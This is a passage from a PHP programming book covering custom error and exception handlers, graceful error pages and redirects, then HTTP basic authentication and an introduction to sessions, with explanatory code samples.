 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
     <title>Error</title>
   </head>
   <body>
     <h1>An error occurred in this application</h1>
     <p>
       An error occurred in this application; please try again. If
       you continue to receive this message, please
       <a href="mailto:webmaster@example.com"
           >contact the webmaster</a>.
     </p>
   </body>
 </html>
 EOH;
     return $message;
   }
 }



Finally, we tell PHP we want to handle exceptions using
ExceptionHandler::handle:


 set_exception_handler(array('ExceptionHandler', 'handle'));

      And we’re done!


      How can I handle PHP
      errors as if they were exceptions?

      Perhaps you prefer exceptions to PHP errors, and want to handle fatal or
      environmental PHP errors as if they were exceptions. No problem!

      Solution
      This task is relatively simple. We need to create a custom exception class and, to
      handle errors, we must add a public static method that throws an exception—that
      is to say, creates an instance of itself:

                                                        ErrorToException.class.php (excerpt)

       class ErrorToException extends Exception
       {
         public static function handle($errno, $errstr)
         {
           throw new self($errstr, $errno);
         }
       }



      This class does not need to extend Exception directly; any Exception-derived
      class will do. You could, for instance, extend the Observable_Exception from “How
      do I create a custom Exception class?”.

      You won’t want to handle all PHP errors this way, though: E_NOTICEs and E_STRICTs
      don’t justify such handling. Fortunately, set_error_handler takes a bitmask of
      error levels as its second argument:

       set_error_handler(
           array('ErrorToException', 'handle'),
           E_USER_ERROR | E_WARNING | E_USER_WARNING
       );



      The example code above dictates that only warnings and user errors will be thrown
      as exceptions.


Discussion
While handling PHP errors as exceptions could be achieved even more simply using
a function, rather than a static method, the approach I’ve explained here has several
advantages. First, it allows you to catch these particular exceptions by type. Second,
the exception class above could extend another custom exception class that provides
additional functionality, such as the ability to log or mail exception information.
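
To illustrate the first advantage, here is a minimal sketch of catching a converted error by its class. The ErrorToException class and the set_error_handler call are repeated from the solution so that the block runs on its own; read_setting is a hypothetical function that exists only to raise a warning. PHP also ships with a built-in ErrorException class intended for this kind of conversion, which could be thrown instead of a custom class.

```php
<?php
class ErrorToException extends Exception
{
    public static function handle($errno, $errstr)
    {
        throw new self($errstr, $errno);
    }
}

set_error_handler(
    array('ErrorToException', 'handle'),
    E_USER_ERROR | E_WARNING | E_USER_WARNING
);

// Hypothetical function that signals a problem with a PHP warning.
function read_setting($name)
{
    trigger_error("Setting '$name' is not defined", E_USER_WARNING);
    return null; // not reached while the handler above is active
}

try {
    read_setting('timezone');
    $outcome = 'no error';
} catch (ErrorToException $e) {
    // Only converted PHP errors land here; other exceptions pass through.
    $outcome = 'caught: ' . $e->getMessage();
    $level = $e->getCode(); // the original PHP error level
}

// Put the previous error handler back once the demonstration is over.
restore_error_handler();
```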


How do I display errors
and exceptions gracefully?
You’ve taken heed of the advice to turn off display_errors on your production
servers so that you don’t accidentally expose sensitive system information to users
(and potentially hackers). If you’re not going to display errors, you’ll need to display
something else instead. But how can you make this happen?

Solution
The solution to this common problem is to build the functionality into your error
or exception handler.

Displaying errors from an error or exception handler is a fairly trivial task, although
you may need to take into consideration whether or not the error is fatal, and
whether or not output buffering is being used.

Since exception handlers are only triggered in the event of an uncaught exception,
you can assume a fatal error when working with an exception handler; an example
of an exception handler was shown in “How do I implement a custom exception
handler with PHP?”. When you’re handling errors, however, you’ll need to check
the error level of each error—you may want to display errors at some error levels,
and not others, for example. The error-level checking can be done by testing the
error level in your error handler, or by passing a second argument to
set_error_handler to define which error levels the error handler should
accommodate.

As for output buffering, we simply need to check the return value of ob_get_level.
If that function returns zero, no output buffering is currently activated and we may
      proceed; otherwise, we need to clean out all output buffers, which we can achieve
      easily by nesting an ob_end_clean call in a while loop:

       while (@ob_end_clean()); 



      We need to use the error suppression operator, @, in this case, because
      ob_end_clean raises an E_NOTICE when there are no buffers left to clean.
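
An alternative that relies on ob_get_level instead of waiting for the notice could be sketched as follows. The helper name discard_output_buffers and its $baseLevel parameter are assumptions made for this illustration. The parameter lets the caller leave untouched any buffers that were already active before the application started its own.

```php
<?php
// Hypothetical helper: discards every output buffer above $baseLevel and
// returns how many buffers were thrown away.
function discard_output_buffers($baseLevel = 0)
{
    $discarded = 0;
    while (ob_get_level() > $baseLevel) {
        if (!@ob_end_clean()) {
            break; // the buffer could not be removed; avoid looping forever
        }
        $discarded++;
    }
    return $discarded;
}

$baseLevel = ob_get_level(); // buffers that were active before we started

ob_start();
echo 'half-rendered page';
ob_start();
echo 'nested fragment';

// Both buffers, and the text inside them, are discarded.
$discarded = discard_output_buffers($baseLevel);
```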

      Let’s put together all the pieces, trapping what we deem fatal errors and throwing
      them as exceptions, and then implementing an exception handler that displays an
      error page, taking into consideration any output buffering that may be in process:

                                                                safeErrorDisplay.php (excerpt)

       class ErrorToException extends Exception
       {
         public static function handle($errno, $errstr)
         {
           throw new self($errstr, $errno);
         }
       }
       set_error_handler(
           array('ErrorToException', 'handle'),
           E_USER_ERROR | E_WARNING | E_USER_WARNING
       );



      The code above defines a class that can be used as a PHP error handler. It simply
      throws itself as an exception. Here, I’ve set it to handle error types of E_USER_ERROR,
      E_WARNING, and E_USER_WARNING, all of which are errors that can be caught, and are
      likely indications that something’s seriously askew in the script.

      Next, let’s define our ExceptionHandler class:

                                                                safeErrorDisplay.php (excerpt)

       class ExceptionHandler
       {
         protected $_exception;
         protected $_logFile = '/tmp/exception.log';
         public function __construct(Exception $e)
         {
           $this->_exception = $e;
         }
         public static function handle(Exception $e)
         {
           $self = new self($e);
           $self->log();
           while (@ob_end_clean());
           ob_start();
           echo $self;
           ob_end_flush();
         }




So far, we’ve defined a class with a static handle method that accepts an exception
as its sole argument. The method instantiates itself, logs the exception, then generates
an error message. Before generating the error message, it clears out all output buffers
to ensure that the error message is the only output returned.

Let’s turn to the details of logging and output generation:

                                                           safeErrorDisplay.php (excerpt)

   public function log()
   {
     error_log($this->_exception->getTraceAsString(), 3,
         $this->_logFile);
   }



Logging is undertaken with PHP’s own error_log function. This approach is safe (it
won’t generate errors itself) and simple to use. If you’re testing this code, be
sure to put the appropriate path and filename in the $_logFile property.

Next, we implement a __toString method:

                                                           safeErrorDisplay.php (excerpt)

   public function __toString()
   {
     $message =<<<EOH
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <title>Error</title>
   </head>
   <body>
     <h1>An error occurred in this application</h1>
     <p>
       An error occurred in this application; please try again. If
       you continue to receive this message, please
       <a href="mailto:webmaster@example.com"
           >contact the webmaster</a>.
     </p>
   </body>
 </html>
 EOH;
     return $message;
   }
 }




      That code should look familiar—it’s similar to the solution in “How do I implement
      a custom exception handler with PHP?”. Our ExceptionHandler class has a
      __toString method that uses a heredoc to generate XHTML output. The method
      could be modified to show details of the exception, such as the message or backtrace,
      but that practice is discouraged in the production environment.

      Finally, of course, we define ExceptionHandler::handle() as the exception
      handler:

                                                               safeErrorDisplay.php (excerpt)

       set_exception_handler(array('ExceptionHandler', 'handle'));



      Discussion
      The solution I’ve presented here achieves two goals: it throws severe PHP errors as
      exceptions, and it uses an exception handler that logs the issues, then generates
      and displays a generic error page for the user.

      Utilizing this solution is a good practice for production systems, as it allows you
      to keep track of site errors while generating a safe display for the end user.

Unfortunately, this solution has one drawback: it doesn’t prevent users from
refreshing the page and triggering the error condition again. Quite often, if a
serious error has occurred, you may not want to keep the code that displays the error
in the same environment as the page on which the error was triggered. In fact, there
may be reasons why displaying an error page under these circumstances might fail
completely (including a lack of database connectivity, bad permissions on template
files, and so on). Additionally, if the user clicks on the browser’s Refresh button to
see if the error occurs again, they’ll likely just perpetuate the problem. Finally,
building the display HTML into a class can have a number of downsides: for
instance, being completely separate from the site template and style sheets, it may
not match your site’s look and feel. As such, you may want to consider redirecting
users to an error page, instead of simply displaying an error page.


How do I redirect users to another
page following an error condition?
So, you’ve got error and exception handlers in place, tried having them display error
pages, and you’re now worried about what will happen when a user refreshes the
page. As an example, imagine this scenario: a database connectivity issue causes
your site’s homepage to display an error page, and now hundreds or thousands of
incoming users are clicking their Refresh buttons.

It may be time to redirect them to an error page instead.

Solution
For this method to work, you’ll need to ensure that output buffering is on, so that
no output (and therefore no headers) has been sent to the browser before the redirect
header is sent. The following sample should serve as a guideline:

 class ExceptionRedirectHandler
 {
   protected $_exception;
   protected $_logFile = '/tmp/exception.log';
   public $redirect = 'http://www.example.com/error';
   public function __construct(Exception $e)
   {
     $this->_exception = $e;
   }
   public static function handle(Exception $e)
   {
     $self = new self($e);
     $self->log();
     while (@ob_end_clean());
     header('HTTP/1.1 307 Temporary Redirect');
     header("Cache-Control: no-cache, must-revalidate");
     header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
     header('Location: ' . $self->redirect);
     exit(1);
   }



      As its name implies, ExceptionRedirectHandler::handle will be used as an exception
      handler. It instantiates the class, logs the exception, clears the output buffers, and
      then redirects to the page indicated in the $redirect property. Several other HTTP
      headers are specified as well.

      We output an HTTP status code of 307, which indicates to the browser that the redirect
      is only temporary. Additionally, Cache-Control and Expires are set in such a way
      that any subsequent visit to the page will force the browser to refresh the
      content and, with any luck, display the intended content instead of an error.
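
Because header calls fail once output has reached the browser, a handler may want to check headers_sent before attempting the redirect. The following is a minimal sketch of that idea, not part of the class above: build_redirect_headers and send_redirect are hypothetical helper names, and the header values are the ones used in the handle method.

```php
<?php
// Hypothetical helper: the header lines used for a temporary redirect.
function build_redirect_headers($url)
{
    return array(
        'HTTP/1.1 307 Temporary Redirect',
        'Cache-Control: no-cache, must-revalidate',
        'Expires: Mon, 26 Jul 1997 05:00:00 GMT',
        'Location: ' . $url,
    );
}

// Hypothetical helper: sends the redirect only if that is still possible.
function send_redirect($url)
{
    if (headers_sent()) {
        return false; // output has already started, so header() would fail
    }
    foreach (build_redirect_headers($url) as $line) {
        header($line);
    }
    return true;
}

$headers = build_redirect_headers('http://www.example.com/error');
```

A handler could call send_redirect and fall back to echoing a static error page when it returns false.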

      Logging is implemented using PHP’s error_log, to which we specify a file argument:

         public function log()
         {
           error_log(
               $this->_exception->getTraceAsString(),
               3,
               $this->_logFile
           );
         }
       }



      The actual message that’s logged is the exception’s backtrace. If you’re testing this
      code, be sure to put the appropriate path and filename in the $_logFile property.

      And the final step, of course, tells PHP that our class’s static method will be handling
      the exceptions:

       set_exception_handler(array('ExceptionRedirectHandler', 'handle'));


Discussion
When it’s combined with the solution shown in “How can I handle PHP errors as
if they were exceptions?”, the strategy I’ve outlined here will allow you to handle
PHP errors and exceptions gracefully, and to prevent issues associated with
re-propagating the conditions when users accidentally (or deliberately) refresh the
page. By redirecting users, you can ensure that if they refresh the page, they’ll remain
on the same error page. You can even take such steps as setting a session cookie to
prevent them from going back to the offending page, if you wish.

If you use this method, I recommend that you redirect your application’s users to
a page that loads a minimal amount of code—perhaps even a static page—to avoid
the situation in which environmental errors, such as database connectivity or
template directory permissions, prevent error display. Regardless of what else the error
page displays, it should provide, as a minimum, the basic navigational elements
found on the rest of your site.


Summary
In this chapter, we took a look at the variety of options PHP offers for error handling.
PHP’s error level constants were discussed, as was the behavior you can expect
at each level. We then turned to look at the built-in mechanisms that PHP offers
for handling error conditions automatically: the mechanisms we reviewed included
displaying and logging errors. Since PHP offers standard mechanisms for error
handling, you may want to be able to trigger errors of your own, a topic that was
discussed in detail. While error handling can be automated through the PHP
interpreter itself, sometimes it’s useful to be able to handle errors yourself, so that
you can undertake such tasks as logging, recovery, and more; to this end, we discussed
how to write and use custom error handlers.

PHP 5 introduced a new error mechanism in the form of exceptions. All PHP 5
exceptions derive from a single internal class called Exception. We discussed how
exceptions bubble up through the code until they’re caught, and investigated the
use of try {…} catch (Exception $e) {…} blocks for this purpose. Additionally,
we created an exception handler to handle uncaught exceptions.

      Since exceptions are so easy to deal with, and since they allow code flow to continue
      from the point at which they’re caught, you may want to throw your PHP errors as
      exceptions, as I explained in this chapter.

      Finally, we saw how easy it is, after an error or exception is handled, to display
      graceful error pages that avoid presenting sensitive system information to your
      users. An alternative—redirecting the users to an error page—was also discussed.

      This chapter has provided a solid grounding to help you develop a professional
      approach to managing errors in your PHP scripts. But don’t stop there! The PHP
      manual has even more information to help you as you improve your PHP practices.
Chapter 10

Access Control
One of the realities of building your site with PHP, as opposed to plain old HTML,
is that you build dynamic web pages rather than static web pages. Making the choice
to develop your site with PHP will allow you to achieve results that aren’t possible
with plain HTML. But, as the saying goes, with great power comes great
responsibility. How can you ensure that only you, or those to whom you give permission, are
able to view and interact with your web site, while it remains safe from the Internet’s
evil hordes as they run riot, spy on private information, or delete data?

In this chapter, we’ll look at the mechanisms you can employ with PHP to build
authentication systems and control access to your site. I can’t stress enough the
importance of a little healthy paranoia in building web-based applications. The
SitePoint Forums frequently receive visits from unhappy web site developers who
have had their fingers burned when it came to the security of their sites.


       Data Transmission Over the Web is Insecure
      Before we go any further into discussing any specific site security topics, you
      must be aware that any system you build that involves the transfer of data from
      a web page over the Internet will send that information in clear text by default
          (unless you’re using HTTPS, which encrypts the data). This potentially enables
          someone to “listen in” on the network between the client’s web browser and the
          web server; with the help of a tool known as a packet sniffer, they’ll be able to
          read the username and password sent via your form, for example. The chance of
          this risk eventuating is fairly small, as typically only trusted organizations like
          ISPs have the access required to intercept packets; however, it is a risk, and it’s
          one you should take seriously.



            About the Examples in this Chapter
          Before we dive in, I need to let you know about the example solutions discussed
          in this chapter.

          The example classes in some of these solutions require the use of a configuration
          file: access_control.ini. This file is used to store various database table names and
          column names used in the examples. Since not everyone names their database
          tables in the same way, configuration values like these are often intended to be
          customizable. The access_control.ini file is read into an array using the PHP
          parse_ini_file function (you can read more about this technique in “How do
          I store configuration information in a file?” in Chapter 6). The configuration file
          looks like this:

                                                                  access_control.ini (excerpt)

            ; Access Control Settings

            ;web form variables e.g. $_POST['login']
            [login_vars]
            login=login
            password=password
            ⋮ more settings follow…



          When an example uses configuration information from this file, that will be
          indicated within the section.
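
As a rough sketch of how such a file ends up as an array, the following parses the excerpt shown above. To stay self-contained it uses parse_ini_string (available from PHP 5.3) on a string rather than parse_ini_file on a real file; both accept the same second argument. The variable names are assumptions made for this illustration.

```php
<?php
// The excerpt shown above, held in a string so the sketch is self-contained.
$ini = <<<'INI'
; Access Control Settings

;web form variables e.g. $_POST['login']
[login_vars]
login=login
password=password
INI;

// Passing true as the second argument keeps the [section] grouping.
$config = parse_ini_string($ini, true);

// Names of the form fields that hold the submitted credentials.
$loginField    = $config['login_vars']['login'];
$passwordField = $config['login_vars']['password'];
```

With a real file, the call would be parse_ini_file('access_control.ini', true), and the resulting array has the same shape.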

          Similarly, the solutions below assume a certain database configuration. The SQL
          details relevant to each solution are indicated in the text where appropriate.

          If you’ve downloaded the code archive for this book from the SitePoint web site,
          you’ll find a file called access_control_dump.sql in the folder for this chapter. You
          can use this file to create the database and insert some sample data. Using this
       file is identical to using the world database in Chapter 2. The instructions found
       at http://dev.mysql.com/doc/world-setup/en/world-setup.html can be used to
       create the access_control database too, like so:


        command prompt> mysql -u root -p
        mysql> CREATE DATABASE access_control;
        mysql> USE access_control;
        mysql> SOURCE access_control_dump.sql;


       Of course, you’ll have to add the missing path and password information as
       appropriate for your system.

       Finally, all these solutions use the PDO class to make the connection to the
       database. For more information about using the PDO class, see Chapter 2. All the
       solutions involving web page forms use the PEAR HTML_QuickForm package.
       You can read more about using this package in “How do I build HTML forms with
       PHP?” in Chapter 5.



How do I use HTTP authentication?

Hypertext Transfer Protocol, or HTTP (the transfer protocol used to send web
pages over the Internet to your web browser), defines its own authentication
mechanisms. These mechanisms, basic and digest authentication, are explained in
RFC 2617.[1] If you run PHP on an Apache server, you can take advantage of these
mechanisms (digest is available from PHP version 5.1.0) using PHP’s header
function and a couple of predefined variables. A general discussion of these features
is provided in the Features section of The PHP Manual.[2]


        HTTP Authentication and Apache
       If you wish to use HTTP authentication on your web site, you can set it up using
       only the Apache configuration settings—PHP is not required. For more information
       on how to do this, see the Apache documentation for your server version.[3]




[1] http://www.ietf.org/rfc/rfc2617
[2] http://www.php.net/manual/en/features.http-auth.php
[3] For example, the documentation for version 2.2 can be found at
    http://httpd.apache.org/docs/2.2/howto/auth.html.


      Solution
      Let’s step through a simple example page that uses the $_SERVER['PHP_AUTH_USER']
      and $_SERVER['PHP_AUTH_PW'] automatic global variables and the WWW-Authenticate
      HTTP header to protect itself—if the current user is not in a list of allowed users,
      access is denied.

      First, we need a list of valid usernames and passwords. For the purpose of this
      simple demonstration, we’ll just use an array, but this would not be advisable for
      a real-world situation where you’d likely use a database (which we’ll see in “How
      do I build a registration system?”). Here’s the $users array:

                                                                    httpAuth.php (excerpt)

       <?php
       $users = array(
         'jackbenimble' => 'sekret',
         'littlepig' => 'chinny'
       );



      Next, we test for the presence of the automatic global variable
      $_SERVER['PHP_AUTH_USER']. If the variable is not set, a username hasn’t been
      submitted and we need to make an appropriate response: an HTTP/1.1 401
      Unauthorized response code, as well as a second header, WWW-Authenticate, to
      indicate that we require basic authentication:

                                                                    httpAuth.php (excerpt)

       if (!isset($_SERVER['PHP_AUTH_USER']))
       {
         header('HTTP/1.1 401 Unauthorized');
         header('WWW-Authenticate: Basic realm="PHP Secured"');
         exit('This page requires authentication');
       }



      If a username has been submitted, we need to check that the username exists in our
      list of valid usernames, then ensure that the submitted password matches the one
      associated with the username in our list:

                                                              httpAuth.php (excerpt)

 if (!isset($users[$_SERVER['PHP_AUTH_USER']]))
 {
   header('HTTP/1.1 401 Unauthorized');
   header('WWW-Authenticate: Basic realm="PHP Secured"');
   exit('Unauthorized!');
 }

 if ($users[$_SERVER['PHP_AUTH_USER']] !== $_SERVER['PHP_AUTH_PW'])
 {
   header('HTTP/1.1 401 Unauthorized');
   header('WWW-Authenticate: Basic realm="PHP Secured"');
   exit('Unauthorized!');
 }
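
The two checks above can also be folded into a single helper that avoids keeping plain-text passwords in the script. This is only a sketch under stated assumptions: it requires PHP 5.5 or later for password_hash and password_verify, the helper name is_valid_login is hypothetical, and the hashes are generated inline purely to keep the example self-contained.

```php
<?php
// In a real application the hashes would be created once and stored;
// they are generated here only to keep the sketch self-contained.
$users = array(
    'jackbenimble' => password_hash('sekret', PASSWORD_DEFAULT),
    'littlepig'    => password_hash('chinny', PASSWORD_DEFAULT),
);

// Hypothetical helper: true only for a known user with a matching password.
function is_valid_login(array $users, $username, $password)
{
    if (!is_string($username) || !is_string($password)) {
        return false; // credentials missing or malformed
    }
    if (!isset($users[$username])) {
        return false; // unknown username
    }
    // Compare the submitted password against the stored hash.
    return password_verify($password, $users[$username]);
}
```

In httpAuth.php, the helper would be called with the values of $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'] once both are known to be set, sending the 401 headers whenever it returns false.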



Finally, if all our checks pass muster, we can proceed to display the web page. In
this example, we simply display the credentials we’ve received from the
authentication form. Of course, this output is for demonstration purposes only; you’d
never do this in a real situation:

                                                              httpAuth.php (excerpt)

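 // Escape the apostrophe, and escape the submitted values before output
 echo 'You\'re in! Your credentials were:<br />';
 echo 'Username: ' . htmlspecialchars($_SERVER['PHP_AUTH_USER']) . '<br />';
 echo 'Password: ' . htmlspecialchars($_SERVER['PHP_AUTH_PW']);
 ?>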



Discussion
To understand how HTTP authentication works, you must first understand what
actually happens when your browser sends a web page request to a web server.
HTTP is the protocol for communication between a browser and a web server. When
your browser sends a request to a web server, it uses an HTTP request to tell the
server which page it wants. The server then replies with an HTTP response that
describes the type and characteristics of the document being sent, then delivers the
document itself.

For example, a client might send the following request to a server:


          GET /subcat/98 HTTP/1.1
          Host: www.sitepoint.com



      Here’s what it might receive from the server in return:

          HTTP/1.1 200 OK
          Date: Sat, 24 Mar 2007 08:12:44 GMT
          Server: Apache/2.0.46 (Red Hat)
          X-Powered-By: PHP/4.3.11
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=ISO-8859-1

          <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
          <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
            <head>
              <title>PHP &amp; MySQL Tutorials</title>
          ⋮ and so on…


      If you’d like to see this process in action, the next example will give you the chance,
      as we open a connection to www.sitepoint.com and request /subcat/98.⁴ The
      example script will read the response from the server and output the complete HTTP
      response for you:

                                                                                            seeHeaders.php

          <?php
          // Connect to sitepoint.com on the standard HTTP port
          $fp = fsockopen('www.sitepoint.com', 80);
          if (!$fp)
          {
            exit('Unable to connect');
          }

          // Send the request; "Connection: close" asks the server to close
          // the socket after responding, so the feof loop below can finish
          fputs($fp,
              "GET /subcat/98 HTTP/1.1\r\nHost: www.sitepoint.com\r\n" .
              "Connection: close\r\n\r\n");

          // Fetch the response
          $response = '';
          while (!feof($fp))
          {
            $response .= fgets($fp, 128);
          }
          fclose($fp);

          // Convert HTML to entities
          $response = htmlspecialchars($response);

          // Display the response
          echo nl2br($response);
          ?>

      ⁴ We use sockets in this example to illustrate the passing of the HTTP headers. You can
      use any of a multitude of alternative methods to get the contents of the page itself, from
      file_get_contents to fopen, fread, and fclose. For more information, see Chapter 6.
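
To work with the pieces of a response rather than just print it, the raw text can be split at the blank line that separates the headers from the body. The following is a minimal sketch of that idea, not part of seeHeaders.php: the function name splitHttpResponse and the canned response are assumptions made for illustration, and the function expects the raw response as read from the socket, before htmlspecialchars is applied.

```php
<?php
// Hypothetical helper: split a raw HTTP response into its parts.
function splitHttpResponse($raw)
{
    // The headers end at the first blank line (CRLF CRLF)
    $parts = explode("\r\n\r\n", $raw, 2);
    $lines = explode("\r\n", $parts[0]);

    // The first line is the status line, e.g. "HTTP/1.1 200 OK"
    $statusLine = array_shift($lines);

    $headers = array();
    foreach ($lines as $line) {
        // Each header is "Name: value"; split on the first colon only
        $pair = explode(':', $line, 2);
        if (count($pair) == 2) {
            $headers[trim($pair[0])] = trim($pair[1]);
        }
    }

    return array(
        'status'  => $statusLine,
        'headers' => $headers,
        'body'    => isset($parts[1]) ? $parts[1] : '',
    );
}

// A canned response, so the sketch runs without a network connection
$raw = "HTTP/1.1 200 OK\r\n" .
       "Content-Type: text/html; charset=ISO-8859-1\r\n" .
       "\r\n" .
       "<html>...</html>";
$parsed = splitHttpResponse($raw);
```

Note that this simple version keeps only the last value when a header name is repeated, which is enough for inspecting a status code or a single header such as WWW-Authenticate.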




Authentication headers are additional headers sent by a server to instruct the browser
that it must send a valid username and password in order to view the page.

In response to a normal request for a page secured with basic HTTP authentication,
a server might respond with headers like these:

 HTTP/1.1 401 Authorization Required
 Date: Tue, 25 Feb 2003 15:41:54 GMT
 Server: Apache/1.3.27 (Unix) PHP/4.3.1
 X-Powered-By: PHP/4.3.1
 WWW-Authenticate: Basic realm="PHP Secured"
 Connection: close
 Content-Type: text/html



No further information is sent, but notice the status code HTTP/1.1 401 Authorization
Required and the WWW-Authenticate header. Together, these HTTP response elements
indicate that the page is protected by HTTP authentication, and isn’t available to
an unauthorized user. A visitor’s browser can convey this information in a variety
of ways, but usually the user will see a small popup like that shown in Figure 10.1.




                         Figure 10.1. The Authentication Required dialog

      The dialog prompts site visitors to enter their usernames and passwords. After
      visitors using Internet Explorer have entered these login details incorrectly three times,
      the browser displays the “Unauthorized” message instead of displaying the prompt
      again. In other browsers, such as Opera, users may be able to continue to try to log
      in indefinitely.

      Notice that the realm value specified in the WWW-Authenticate header is displayed
      in the dialog. A realm is a security space or zone within which a particular set of
      login details is valid. Upon successful authentication, the browser will remember
      the correct username and password combination, and automatically send it with any
      future request to that realm. When the user navigates to another realm, however,
      the browser displays a fresh prompt once again.

      In any case, the user must provide a username and password to access the page.
      The browser sends those credentials with a second page request like this:

          GET /admin/ HTTP/1.1
          Host: www.sitepoint.com
          Authorization: Basic jTSAbT766yN0hGjUi



      The Authorization header contains the username and password encoded with
      base64 encoding which, it’s worth noting, isn’t secure—it’s unreadable for humans,
      but it’s a trivial task to convert base64-encoded values back to the original text.
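
To see just how trivial the conversion is, here is a short sketch that recovers the username and password from the value of an Authorization header. The function name decodeBasicAuth and the sample credentials are assumptions for illustration only; in practice PHP does this work for you and exposes the results as $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'].

```php
<?php
// Hypothetical helper: recover the username and password from the value
// of an "Authorization: Basic ..." header.
function decodeBasicAuth($headerValue)
{
    if (strpos($headerValue, 'Basic ') !== 0) {
        return false; // not a Basic authentication header
    }
    // Strict mode makes base64_decode return false on invalid input
    $decoded = base64_decode(substr($headerValue, 6), true);
    if ($decoded === false || strpos($decoded, ':') === false) {
        return false;
    }
    // The decoded text is "username:password"; split on the first colon
    list($user, $pass) = explode(':', $decoded, 2);
    return array('user' => $user, 'pass' => $pass);
}

// Build a sample header value the way a browser would (sample data only)
$header = 'Basic ' . base64_encode('bob:secret');
$credentials = decodeBasicAuth($header);
```

Anyone who can observe the request can do the same, which is why basic HTTP authentication is usually combined with an encrypted connection.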

      The server will check to ensure that the credentials are valid. If they’re not, the
      server will send the HTTP/1.1 401 Authorization Required response again, as shown
      previously. If the credentials are valid, the server will send the requested page as
      normal.
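
The server-side decision described here can be sketched as two small functions: one that validates the credentials against a list of users, and one that builds the challenge to send when validation fails. The names credentialsAreValid and challengeHeaders and the sample user are assumptions, and the sketch swaps the plain != comparison used in httpAuth.php for hash_equals (available from PHP 5.6), which compares strings in constant time.

```php
<?php
// Hypothetical helper: decide whether a request may proceed, given a list
// of valid users like the $users array in httpAuth.php.
function credentialsAreValid($users, $user, $pass)
{
    if (!is_string($user) || !isset($users[$user])) {
        return false; // unknown (or missing) username
    }
    // hash_equals compares in constant time, which avoids leaking
    // information through response timing
    return hash_equals($users[$user], (string) $pass);
}

// Hypothetical helper: the status line and challenge header that tell
// the browser to prompt for credentials
function challengeHeaders($realm)
{
    return array(
        'HTTP/1.1 401 Unauthorized',
        'WWW-Authenticate: Basic realm="' . $realm . '"',
    );
}

$users = array('jackbenimble' => 'sekret'); // sample data only
$allowed = credentialsAreValid($users, 'jackbenimble', 'sekret');
$challenge = challengeHeaders('PHP Secured');
```

In a page script, each string returned by challengeHeaders would be passed to header(), followed by exit, whenever credentialsAreValid returns false.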

      If you expect to use HTTP authentication a lot, consider the Auth_HTTP package
      available from PEAR.⁵ Auth_HTTP provides an easy-to-use API so that you don’t
      have to worry about handling the header calls yourself.

      ⁵ You can view the package’s information at http://pear.php.net/Auth_HTTP/.


                 Sending Headers
               In PHP, the moment your script outputs anything that’s meant for display, the
               web server finishes sending the headers and begins to send the content itself. You
               cannot send further HTTP headers once the output of the body of the HTTP
               message (the web page itself) has commenced. If you do use the header or
               session_start functions after the rendering of the body has begun, you’ll see
               an error message like this:


       Warning: Cannot add header information - headers already
       sent by (output started at…


      Remember, any text or whitespace outside the <?php … ?> tags causes output
      to be sent to the browser. If you have whitespace before a <?php tag or after a ?>
      tag, you won’t be able to send headers to the browser beyond that point.
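
One way to guard against this problem is to check headers_sent before calling header, and to use output buffering so that the body is held back until the headers are settled. The sketch below illustrates both; the function name sendHeaderIfPossible and the X-Example header are assumptions made for the example.

```php
<?php
// Hypothetical helper: send a header only if that is still possible.
function sendHeaderIfPossible($header)
{
    // headers_sent() fills $file and $line with the place output began
    if (headers_sent($file, $line)) {
        error_log("Cannot send '$header': output started at $file:$line");
        return false;
    }
    header($header);
    return true;
}

// Output buffering holds the body back, so a header can still be sent
// after an echo, provided nothing was output before ob_start()
ob_start();
echo 'This text waits in the buffer.';
$sent = sendHeaderIfPossible('X-Example: demo');
ob_end_flush();
```

Buffering doesn't help with whitespace that appears before the opening <?php tag, since that output is sent before ob_start has a chance to run.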



How do I use sessions?

Sessions are a mechanism that allows PHP to preserve state between executions.
In simple terms, sessions allow you to store variables from one page—the state of
that page—and use them on another. For example, if a visitor submits his first name,
Bob, via a form on your site, sessions will allow your site to remember his name,
and allow you to place personal messages such as “Where would you like to go
today, Bob?” on all the other pages of your site for the duration of his visit. Don’t
be surprised if Bob leaves rather quickly, though!

The basic mechanism of sessions works like this: first, PHP generates a unique,
32-character string to identify the session. PHP then passes the value to the browser;
simultaneously, it creates a file on the server and includes the session ID in the
filename. There are two methods by which PHP can keep track of the session ID: it
can add the ID to the query string of all relative links on the page, or send the ID as
a cookie. Within the file that’s stored on the server, PHP saves the names and values
of the variables it’s been told to store for the session.

When the browser makes a request for another page, it tells PHP which session it
was assigned via the URL query string, or by returning the cookie. PHP then looks
up the file it created when the session was started, and so has access to the data
stored within the session.
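
The pieces of this mechanism can be pictured with a few small functions. This is an illustration only: PHP generates session IDs and manages the files itself, and the function names here are assumptions. What the sketch does rely on is that the default file-based storage names each file sess_ followed by the session ID, and that the default session name is PHPSESSID.

```php
<?php
// Hypothetical illustration only: PHP creates real session IDs itself.
// This mimics the shape of a 32-character ID.
function makeExampleSessionId()
{
    return md5(uniqid('', true));
}

// With the default file-based storage, each session's data lives in a
// file named "sess_" followed by the session ID
function sessionFilePath($savePath, $sessionId)
{
    return rtrim($savePath, '/') . '/sess_' . $sessionId;
}

// The two ways the ID can travel back to the server
function sessionCookieHeader($sessionId)
{
    return 'Cookie: PHPSESSID=' . $sessionId;
}

function sessionQueryString($sessionId)
{
    return '?PHPSESSID=' . $sessionId;
}

$id   = makeExampleSessionId();
$path = sessionFilePath('/tmp', 'ce558537fb4aefe349bb8d48c5dcc6d3');
```

In a real script you would never build these values by hand; session_id() and session_save_path() report the ID and storage directory that PHP is actually using.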

Once the session has been established, it’ll continue until it’s specifically destroyed
by PHP (in response to a user clicking Log out, for example), or the session has been
inactive for longer than a given period of time (as specified in your php.ini file under
session.gc_maxlifetime). At this point it becomes flagged for garbage collection
and will be deleted the next time PHP checks for outdated sessions.
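
Because an expired session is only deleted the next time PHP checks for outdated sessions, an application that needs a firm inactivity limit may want to test the idle time itself. Here is a minimal sketch of such a test; the function name sessionHasExpired is an assumption, and the timestamps would normally come from a value your own code stores in the session on each request.

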